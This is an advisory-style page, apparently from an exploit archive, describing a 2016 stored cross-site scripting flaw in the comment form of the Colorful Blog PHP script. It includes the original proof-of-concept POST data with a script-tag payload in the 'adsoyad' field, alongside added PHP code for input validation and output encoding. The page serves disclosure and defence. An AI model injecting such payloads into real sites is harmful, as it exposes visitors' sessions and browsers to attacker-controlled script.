Vendor: Colorful Blog
By: Besim
CVSS: 8,8 (HIGH)
Stored Cross Site Scripting
CWE: 79
Product Name: Colorful Blog
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
Year: 2016

Colorful Blog – Stored Cross Site Scripting

A stored XSS vulnerability exists in Colorful Blog: the 'adsoyad' parameter submitted through the post comment section of the 'single.php' page accepts malicious JavaScript code. By sending a crafted POST request containing the payload, an attacker can execute arbitrary JavaScript code in the victim's browser.

Mitigation:

Input validation should be used to prevent malicious code from being stored in the application. Additionally, the application should use a whitelist of accepted characters and reject any input that contains characters outside of the whitelist.
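
The mitigation above as an added example (not code from Colorful Blog or from the advisory): allowlist validation of the comment fields before storage, plus HTML encoding at render time so that a stored value is displayed as text even if validation is bypassed or loosened later. Function names and length limits are assumptions; the field names come from the POST data on this page.

```php
<?php
declare(strict_types=1);
// Added example. Function names/limits are assumptions; field names are from this page.

function field(array $post, string $key): string
{
    $v = $post[$key] ?? '';
    return is_string($v) ? trim($v) : '';   // arrays (adsoyad[]=x) become ''
}

/** Returns the names of rejected fields; an empty array means "store it". */
function validate_comment(array $post): array
{
    $bad = [];
    // Name allowlist: Unicode letters/marks, space, dot, apostrophe, hyphen (invalid UTF-8 fails).
    if (preg_match('/^[\p{L}\p{M} .\'-]{1,64}$/u', field($post, 'adsoyad')) !== 1) {
        $bad[] = 'adsoyad';
    }
    if (filter_var(field($post, 'email'), FILTER_VALIDATE_EMAIL) === false) {
        $bad[] = 'email';
    }
    // Website is optional; accept a bare hostname only, never a full URL or scheme.
    $web = field($post, 'web');
    if ($web !== '' && filter_var($web, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) === false) {
        $bad[] = 'web';
    }
    // Free text cannot be allowlisted tightly: bound length, require valid UTF-8.
    if (preg_match('/^.{1,2000}$/us', field($post, 'mesaj')) !== 1) {
        $bad[] = 'mesaj';
    }
    return $bad;
}

/** HTML-encode a stored value at render time (element content or quoted attribute). */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed request reusing the POST data from this page.
$post = [
    'adsoyad' => "<script>alert('document.cookie')</script>",
    'email'   => 'besim@yopmail.com',
    'web'     => 'example.com',
    'mesaj'   => 'Nice, blog post',
];
echo 'rejected: ', implode(',', validate_comment($post)), PHP_EOL;
echo 'encoded:  ', e($post['adsoyad']), PHP_EOL;
```

The 'mesaj' field accepts arbitrary text, so its safety depends entirely on calling the encoder wherever the stored comment is written into HTML.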

Exploit-DB raw data:

# Exploit Title : ----------- : Colorful Blog - Stored Cross Site Scripting
# Author : -----------------  : Besim
# Google Dork : ---------  :    -
# Date : -------------------- : 13/10/2016
# Type : -------------------- : webapps
# Platform : --------------- : PHP  
# Vendor Homepage :-- : -
# Software link : --------- : http://wmscripti.com/php-scriptler/colorful-blog-scripti.html


Description : 

# Vulnerable link : http://site_name/path/single.php?kat=kat&url='post_name'

*-*-*-*-*-*-*-*-* Stored XSS Payload *-*-*-*-*-*-*-*-* 

*-* Vulnerable URL : http://site_name/path/single.php?kat=kat&url='post_name'    ---   Post comment section
*-* Vuln. Parameter : adsoyad
*-* POST DATA        :  adsoyad=<script>alert('document.cookie')</script>&email=besim@yopmail.com&web=example.com&mesaj=Nice, blog post